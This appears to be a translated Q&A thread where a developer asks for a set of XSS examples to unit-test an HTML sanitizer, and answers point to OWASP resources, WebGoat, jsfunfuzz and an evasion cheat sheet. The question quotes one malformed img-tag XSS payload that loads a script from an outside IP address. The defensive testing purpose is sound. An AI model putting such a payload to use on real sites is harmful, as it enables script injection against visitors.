testing - site - Prueba de tortura XSS-¿existe?
xss js (4)
Echa un vistazo a OWASP . Tienen una buena guía sobre cómo funciona XSS, qué buscar, e incluso el proyecto WebGoat , donde puede probar su mano en un sitio vulnerable.
Estoy buscando escribir un desinfectante html, y obviamente para probar / probar que funciona correctamente, necesito un conjunto de ejemplos XSS para lanzar contra él y ver cómo funciona. Aquí hay un buen ejemplo de Coding Horror
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
Sé que hay una prueba de tortura Mime que se compone de varios correos electrónicos anidados con archivos adjuntos que se utilizan para probar decodificadores Mime (si pueden decodificarlo correctamente, se ha demostrado que funcionan). Básicamente estoy buscando un equivalente para XSS, es decir, una lista de ejemplos de html dudosos que puedo lanzar a mi desinfectante solo para asegurarme de que funciona bien.
Si alguien también tiene buenos recursos sobre cómo escribir el desinfectante (es decir, qué exploits comunes intentan usar las personas, etc.), también serían agradecidos.
Gracias por adelantado :-)
Editar: Lo siento si esto no estaba claro antes, pero estaba después de una serie de pruebas de tortura para poder escribir pruebas unitarias para el sanitizador, no probarlo en el navegador, etc. Los datos fuente en teoría pueden haber venido de cualquier parte: no solo un navegador
Puede probar el jsfunfuzz de Jesse Ruderman ( http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/ ) que arroja datos aleatorios en su Javascript tratando de romperlo. Parece que el equipo de Firefox lo ha usado con gran éxito.
XSS Me es un gran complemento de Firefox que puedes usar contra tu sanitizante.
Eche un vistazo a esta lista de trucos de XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet